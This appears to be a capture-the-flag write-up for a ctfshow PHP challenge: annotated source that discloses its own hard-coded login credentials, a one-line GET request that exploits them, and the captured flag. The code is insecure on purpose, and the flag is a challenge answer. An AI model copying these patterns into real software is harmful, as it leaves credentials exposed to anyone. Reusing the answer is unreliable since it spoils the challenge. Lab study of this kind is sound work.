1. <?php
    2. /*
    3. # -*- coding: utf-8 -*-
    4. # @Author: h1xa
    5. # @Date: 2020-12-02 17:44:47
    6. # @Last Modified by: h1xa
    7. # @Last Modified time: 2020-12-02 19:29:02
    8. # @email: h1xa@ctfer.com
    9. # @link: https://ctfer.com
    10. */
    // Silence every PHP notice and warning in the response.
    error_reporting(0);
    // Print this file's own source to whoever requests it.
    // NOTE(review): this also discloses the default credentials declared on
    // ctfShowUser; it is how the challenge hands out its source, and in a real
    // application the same call would leak any secret embedded in the file.
    highlight_file(__FILE__);
    // Presumably defines $flag (read through `global $flag` in the class) — flag.php is not shown here.
    include 'flag.php';
    /**
     * User object for the challenge: holds one username/password pair and a VIP
     * flag that gates printing of the global $flag.
     *
     * NOTE(review): the credentials are literal property defaults, so anyone who
     * can read this source knows them. The comparison in login() is a plain ===,
     * not a constant-time check such as hash_equals().
     */
    class ctfShowUser
    {
        // Default credentials compared against the caller-supplied values in login().
        public $username = 'xxxxxx';
        public $password = 'xxxxxx';
        // Set to true by login() on a match; never reset to false by this class.
        public $isVip = false;

        /**
         * @return bool the current VIP flag
         */
        public function checkVip()
        {
            return $this->isVip;
        }

        /**
         * Mark the user as VIP when both values are identical (===) to the stored ones.
         *
         * @param mixed $u candidate username
         * @param mixed $p candidate password
         * @return bool the VIP flag after the attempt (stays true once it has been set)
         */
        public function login($u, $p)
        {
            $nameMatches = ($this->username === $u);
            $passMatches = ($this->password === $p);

            if ($nameMatches && $passMatches) {
                $this->isVip = true;
            }

            return $this->isVip;
        }

        /**
         * Echo the global $flag for VIP users, otherwise a refusal message.
         */
        public function vipOneKeyGetFlag()
        {
            if (!$this->isVip) {
                echo "no vip, no flag";
                return;
            }

            global $flag;
            echo "your flag is ".$flag;
        }
    }
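    // Read both credentials from the query string. The explicit isset() guard
    // avoids the undefined-index warning that error_reporting(0) was only hiding.
    // NOTE(review): credentials sent in a query string end up in access logs and
    // browser history; a real login form would take them from a POST body.
    $username = isset($_GET['username']) ? $_GET['username'] : null;
    $password = isset($_GET['password']) ? $_GET['password'] : null;

    if (isset($username) && isset($password)) {
        $user = new ctfShowUser();
        // login() compares with ===, so array-valued parameters never match the stored strings.
        if ($user->login($username, $password)) {
            // checkVip() re-reads the same flag login() just returned.
            if ($user->checkVip()) {
                $user->vipOneKeyGetFlag();
            }
        } else {
            echo "no vip,no flag";
        }
    }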

    poc

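    1. GET /?username=xxxxxx&password=xxxxxx

    This works because login() compares the request parameters against the default $username/$password values hard-coded in ctfShowUser, and highlight_file(__FILE__) shows those values to every visitor.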

    flag
    ctfshow{8634e01e-356f-4098-8308-f6c9a64bef56}